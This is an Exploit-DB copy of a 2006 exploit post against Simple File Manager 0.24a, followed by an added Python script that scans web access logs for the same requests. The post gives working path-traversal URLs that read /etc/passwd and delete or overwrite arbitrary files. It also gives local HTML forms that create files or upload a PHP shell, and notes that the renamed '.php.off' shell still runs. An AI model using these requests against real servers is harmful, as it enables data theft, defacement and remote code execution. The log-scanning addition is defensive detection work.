Exploit simple file manager 0.24a - Multiple Vulnerabilities

Exploiter

18 Dec 2022
EDB-ID: 2883
EDB verification: Passed
Author: FLAME
Vulnerability type: WEBAPPS
Platform: PHP
CVE: CVE-2006-6376
Publication date: 2006-12-02
Code:
/*******************************************\
| flame vrs Simple File Manager <=0.24=>    |
| http://onedotoh.sourceforge.net/          |
| Various Vulnerabilities Including:        |
\*******************************************/
/+++++++++++++++++++++++++++++++++++++++++++\
| Using the scripts supplied by the webapp: |
| Reading of Arbitrary files                |
| Deletion of Arbitrary files               |
| Modification of Arbitrary files           |
| Creation of Arbitrary files               |
| Uploading of Malicious files              |
\+++++++++++++++++++++++++++++++++++++++++++/


/&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\
| Simple File Manager (SFM) is a web based  |
| file management utility.                  |
| It is designed to be used by those that   |
| don't want to use ftp or SHOULD NOT use   |
| ftp. It can be dropped into a specific    |
| directory and give access to that         |
| directory as well as any directory below  |
| it, including those created by SFM. It    |
| can be placed in a specific directory and |
| configured to give access to other        |
| directories outside of its location       |
| (centralized). SFM gives its user upload, |
| rename, delete, directory creation as     |
| well as directory navigation (within its  |
| tree limits), as well as Create New File; |
| it also includes an image viewer, text    |
| viewer and mime type downloading.         |
\&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/
 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ |
 | Thats the description from the author...|
 | Which basically outlines all of its     |
 | vulnerabilities.                        |
 \_________________________________________/

/=========================================================================================================================\
############################ .:Reading of Arbitrary Files:. ###############################################################
# fm.php?action=download&filename=[RELATIVE PATH / FILENAME]&pathext=&u=&&copt=1&sortKey=2                                #
# EG: http://www.site.com/file/fm.php?action=download&filename=../../../../../../etc/passwd&pathext=&u=&&copt=1&sortKey=2 #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################ .:Deletion of Arbitrary Files:. ##############################################################
# fm.php?delete=[RELATIVE PATH / FILENAME]&copt=1&sortKey=2&u=&pathext=                                                   #
# EG: http://www.site.com/file/fm.php?delete=phpshell.php&copt=1&sortKey=2&u=&pathext=                                    #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################# .:Modification of Arbitrary Files:. #########################################################
# fm.php?edit=[RELATIVE PATH / FILENAME]&u=&copt=1&pathext=                                                               #
# EG: http://www.site.com/file/fm.php?edit=../index.php&u=&copt=1&pathext=                                                #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################# .:Creation of Arbitrary Files:. #############################################################
# START LOCAL HTML FILE:                                                                                                  #
 <form name="form1" method="post" action="http://www.site.com/file/fm.php">
 <center>Filename: <input type="text" name="newfilename">
 <select class=altButton name="newfileext">
 <option>.txt</option><option>.html</option><option>.php</option>
 </select>
 <textarea name="newcontent" cols="60" rows="15"></textarea>
 <input type="hidden" name="copt" value="1">
 <input type="submit" name="savenew" value="Save">
 <input type="hidden" name="u" value="">
 <input type="hidden" name="pathext" value="/">
 <input type="hidden" name=sortKey value="2">
 </center>
 </form>
# END LOCAL HTML FILE                                                                                                     #
###########################################################################################################################
# Note... various characters are escaped. And by default all .php files will be renamed to file.php.off                   #
# Note... The author decided to let you change the fm.php file anyway (*See Modification of Arbitrary files)              #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################## .: Uploading of Malicious Files:. ##########################################################
# START LOCAL HTML FILE:                                                                                                  #
<form name="form1" method="post" action="http://www.site.com/file/fm.php" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="104857600">
<input type="hidden" name="copt" value="1">
<input type="file" name="uploadedfile">
<input type="submit" name="upload" value="Upload">
<input type="hidden" name="u" value="">
<input type="hidden" name="pathext" value="/">
<input type="hidden" name=sortKey value="2">
</form>
# END LOCAL HTML FILE                                                                                                     #
###########################################################################################################################
# Note... By default all .php files will be renamed to file.php.off, you can usually just browse to the file anyway and it#
# will execute... EG: http://www.site.com/file/phpshell.php.off                                                           #
###########################################################################################################################
\=========================================================================================================================/

                                       /++++++++++++++++++++++++++++\
                                       | Be good, and dont be too   |
                                       | hopeful about finding      |
                                       | yourself a gibbon running  |
                                       | this script. It predates   |
                                       | my #999999 hair.           |
                                       \++++++++++++++++++++++++++++/

      /{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}\
      |---------------------------------------|
      | <&bk> stfu flame                      |
      | <~PhaZe_One> no fame without flame    |
      | <+c|p> I love you flame               |
      | <%emc2> flame wishes death upon you   |
      | <Thaimaishu> are you emo flame?       |
      | <&[myg0t]40> flame dont be mad        |
      | *~str0ke humps flame's leg            |
      | <&ZoNe_VoRTeX> <3 flame               |
      |---------------------------------------|
      \{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}/

# milw0rm.com [2006-12-02]
 
Source: www.exploit-db.com
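
A defender's view of the request patterns listed in the advisory, as an added example that is not part of the original advisory or post: a Python scan of web access logs for `fm.php` requests whose `filename`, `delete` or `edit` parameter leaves the managed directory, and for direct requests to `.php.off` files. It goes slightly beyond the advisory by also catching double-encoded traversal; the log lines, addresses and file names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# fm.php query parameters that carry a file name in the advisory's requests.
FILE_PARAMS = ("filename", "delete", "edit")

# Constructed sample lines in Apache common log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [02/Dec/2006:10:00:01 +0000] "GET /file/fm.php?action=download&filename=notes.txt&pathext=&u=&&copt=1&sortKey=2 HTTP/1.1" 200 512
198.51.100.7 - - [02/Dec/2006:10:00:05 +0000] "GET /file/fm.php?action=download&filename=..%2F..%2Fetc%2Fpasswd&pathext=&u=&&copt=1&sortKey=2 HTTP/1.1" 200 1840
198.51.100.7 - - [02/Dec/2006:10:00:09 +0000] "GET /file/fm.php?edit=%252e%252e%252findex.php&u=&copt=1&pathext= HTTP/1.1" 200 2210
203.0.113.4 - - [02/Dec/2006:10:01:30 +0000] "GET /file/upload1.php.off HTTP/1.1" 200 64
192.0.2.10 - - [02/Dec/2006:10:02:00 +0000] "GET /file/fm.php?delete=old.txt&copt=1&sortKey=2&u=&pathext= HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(uri):
    """Return the reasons a request URI matches the advisory's patterns."""
    parts = urlsplit(uri)
    path = fully_decode(parts.path).lower()
    findings = []
    if path.endswith(".php.off"):
        findings.append("renamed script requested directly")
    if path.endswith("/fm.php"):
        params = parse_qs(parts.query, keep_blank_values=True)
        for name in FILE_PARAMS:
            for raw in params.get(name, []):
                value = fully_decode(raw).replace("\\", "/")
                if ".." in value.split("/") or value.startswith("/"):
                    findings.append(name + " points outside the managed directory")
    return findings

def scan(log_text):
    """Return (client, status, finding) for every suspicious request line."""
    alerts = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if match:
            client, uri, status = match.groups()
            alerts += [(client, int(status), f) for f in classify(uri)]
    return alerts
```

The form-based file creation and upload requests are POSTs, so their parameters do not appear in a standard access log; covering them needs request-body logging or a WAF rule.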
